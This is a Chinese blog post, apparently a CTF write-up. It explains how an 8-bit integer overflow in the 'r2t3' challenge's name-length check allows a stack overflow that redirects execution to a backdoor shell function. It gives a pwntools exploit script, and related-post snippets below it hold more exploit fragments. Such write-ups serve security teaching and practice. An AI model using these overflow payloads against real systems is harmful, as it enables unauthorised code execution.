[BJDCTF 2nd]r2t3 (整型溢出)

最新推荐文章于 2021-01-19 16:06:16 发布
最新推荐文章于 2021-01-19 16:06:16 发布
阅读量202 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/111286770
版权
博客分析了一个开启了NX保护的程序,通过IDA查看发现输入读取到buf并传递给name_check函数,该函数内部存在长度判断,允许3到8个字符的输入。当输入超过8个字符时,会发生栈溢出。由于整数溢出,输入260字节可以绕过长度检查并覆盖返回地址。通过将返回地址设置为后门函数的地址,可以获取shell。提供的exploit代码展示了如何构造payload实现这一过程。
摘要由CSDN通过智能技术生成

进入到题目环境,程序接收一个输入,测试之后,发现输入任何值的返回都是Oops,u name is too long!
checksec查看一下程序保护,只开启了NX
在这里插入图片描述
那就用IDA分析一下程序,将输入读取到buf的内存当中,又作为name_check函数的参数
在这里插入图片描述
进入到name_check函数里,存在一个判断,如果参数的长度大于3且小于等于8,则将s的值复制到dest的内存空间里。
在这里插入图片描述
分析之后,当通过条件判断之后,变量dest可以造成栈溢出
这里也存在整数溢出,v3的类型为unsigned __int8是一个字节,即8位,最多表示255

     Int8, 等于Byte, 占1个字节.

    Int16, 等于short, 占2个字节. -32768 32767

    Int32, 等于int, 占4个字节. -2147483648 2147483647

    Int64, 等于long, 占8个字节. -9223372036854775808 9223372036854775807

    这样, 看起来比short,int,long更加直观些!

   另外, 还有一个Byte, 它等于byte, 0 - 255.

  所以说这里的v3是占一个字节的,一个字节是由8位二进制决定的。

  例如:0000 0000 就是一个字节,代表0,1111 1111 也是一个字节,代表255.

如果1111 1111再加1呢?结果就是0000 0000了,但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作,可以看到这里有个判断就是判断v3的长度,必须是在(3,8]这个区间内,满足这个容易,但是就溢出不到返回地址,要想溢出到返回地址,其实输入name的值是肯定要比8大的,这里就用到了这个整数溢出,我们可以给name的值的长度为260,这样就可以既绕过判断长度,又可以溢出到返回地址。

在程序中有后门函数,因此在返回地址放入后门函数的地址即可获得shell
exp:

from pwn import *

p = remote('xxxxxx',xxxxx)
context.log_level = 'debug'

shell = 0x0804858B
payload = 'a'*21 + p32(shell) #11H+4 = 21
payload += 'b'*(255-len(payload)+4)
p.sendlineafter('name:',payload)

print p.recv()
p.recv()
p.interactive()
沫忆末忆
关注
专栏目录
BJDCTF_2nd PWN复盘
weixin_44145820的博客
03-26 669
目录r2t3one_gadgetydsneedgirlfriend2r2t4 r2t3 在name_check函数中有一个strcpy,看起来是溢出的机会,但是前面判断了长度,这里在汇编下才能发现漏洞 即只要长度超过255就会溢出 Exp: from pwn import * r = remote("node3.buuoj.cn", 29302) elf = ELF("./BJDCTF_2...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1479
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
[BUUCTF]PWN12——[BJDCTF 2nd]r2t3
mcmuyanga的博客
08-29 472
[BUUCTF]PWN12——[BJDCTF 2nd]r2t3 题目网址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 步骤: 例行检查,32位,开启了NX保护 nc一下看看程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了system函数和 ‘/bin/sh’ 字符串 双击跟进,ctrl+x找到调用改字符串的函数,找到了程序里的一个后门函数,shell_addr=0x804858B 根据nc得到的提示字符串,找到输
[BJDCTF 2nd]r2t3
、moddemod
06-11 352
exp from pwn import * context.log_level = 'debug' proc_name = './r2t3' # sh = remote('node3.buuoj.cn', 28627) # sh = process(proc_name) elf = ELF(proc_name) system_addr = elf.plt['system'] main_addr = elf.sym['main'] bin_sh_addr = 0x08048760 # n = 0...
buuoj BJDCTF 2nd r2t3
pondzhang的专栏
03-26 707
buf定义长度为0x400。而buf的长度为0x408 所以不存在溢出。 可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...
[BUUCTF]PWN------[BJDCTF 2nd]r2t3
BangSen1的博客
01-19 194
[BJDCTF 2nd]r2t3 例行检查,32bit,开启NX保护 nc 一下,没有有用的信息 用IDA打开,注意到了/bin/sh,继续跟进 找到了这个后门函数,shell_addr=-0x084858B,再去查看主函数 我们可以看到,buf的大小是0x408,但限制读取0x400,所以不存在溢出, 再看name_check函数,它对我们的长度进行了规定,要在4~7之间,但它负责接收buf的变量v3是unsigned_int8型的,即无符号整形。因此可以表示的范围为0–2^8-1(255) b
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
xlcvv的博客
04-28 1612
进入题目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-Pwn-[BJDCTF 2nd] r2t3
归子莫的博客
05-06 706
CTF-Pwn-[BJDCTF 2nd] r2t3 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd] r2t3 下载题目的文件 R2t3 思路 使用file命令查看,发...
BJDCTF 2nd - Pwn(r2t3、one_gadget、r2t4)
像初雪一样自由洒落
03-25 624
r2t3 最简单的一道题,可是我竟然没有做出来,无语了,,, 文件保护没啥好说的,,,很正常 进入name_check函数 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 260 ==> 4,261 ==> 5,262 ==> 6,263 ==> 7,264 ==...
buuctf r2t3
carol2358的博客
04-14 259
整数溢出 ida: 漏洞在name_check里,unsigned_int8相当于char,一个字节,最大数值为0xff(255),0xff+1=0x100(256), 所以我们只要输入在0x104到0x108之间的都可以,换成十进制就是260到264 本题本地打不通,但远端是可以打通的 from pwn import * from LibcSearcher import * conte...
整形溢出
Trick的博客
11-23 513
[BJDCTF 2nd]r2t3 来自buuctf 先看ida buf缓冲区大小为408h,而read读取大小为400h,比buf要小,所以不能进行简单的缓冲区栈溢出。 再看name_check函数,v3是int8类型的变量,1111 1111 = 0xFF = 255。当0xFF +1的时侯,变量发生整形溢出,0x100 = 256 此时v3的数值为零(0000 0000),但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作变成 1 0000 0000。 同时还要满足3< v3
西普CTF训练(溢出
技术学习人生
06-27 3742
1、加减乘除 http://ctf1.simplexue.com/overflow/1/ 给定一段汇编代码,求shellcode linux下编写c代码void main() { asm( "_start:\n\t" "jmp test1\n\t" "test2:\n\t" "pop %ebx\n\t"
非完美算法之 ZJOI2017R2T3 字符串string
chenyanbo1111的博客
04-29 1285
众所周知非完美算法的重要性。 然而不要看错题更重要 昨天的二试T3我光荣爆〇。 我写了个后缀树组,然后,写了个ST表。 我潜意识里认为子串l..r的后缀为i..n 哎下面来到正题。 今天我开始订正。 T3没打暴力。于是打了一发,交到uoj上,卧槽30!过了1,6,7三个点。气出血 这充分说明了写namespace以“分开”程序的重要性。 然后,我开始骗分。速度瓶颈,也称速
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1997
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型溢出溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
[BJDCTF 2nd] WEB 简单题汇总
SopRomeo的博客
03-26 3117
Web简单题复现[BJDCTF 2nd]fake google在这里插入图片描述 经过测试,存在xss和模板注入,这题是模板注入 [参考文献](https://xz.aliyun.com/t/3679)[BJDCTF 2nd]old-hack[BJDCTF 2nd]duangShell[BJDCTF 2nd]简单注入方法一:方法二:方法三:[BJDCTF 2nd]Schrödinger[BJDC...
BJDCTF_r2t3
weixin_44864859的博客
04-09 367
BJDCTF_r2t3 考点:考点:短整型溢出 1.首先检查程序的基础信息 32位程序,可以看到这开启了NX保护,说明无法在栈上执行shellcode 2.运行程序,对程序功能有基本了解 程序基本功能:输入name,对name长度进行判断 3.用ida打开进行分析 这里截取了关键部分对代码 首先在main函数中,没有任何可疑的 进入name_check函数:接受了一个最大长度为0x400的b...
BJDCTF2nd
Amherstieae的博客
05-25 1120
本文写于3.24,只是那个时候还莫得博客,遂现在才发出。 写在前面 大家好呀,这里是β-AS,是一枚真的小菜鸡,希望路过的师傅带带我鸭 这是第二届BJDCTF,作为真弟弟只对crypto和misc感兴趣呀,然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助,也希望路过的大佬带带我(这是关键) 哦对了,七校联盟萌新赛????嗯?????? 出题人出来!线下1V1来不来!! (假的,我打不过你) CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值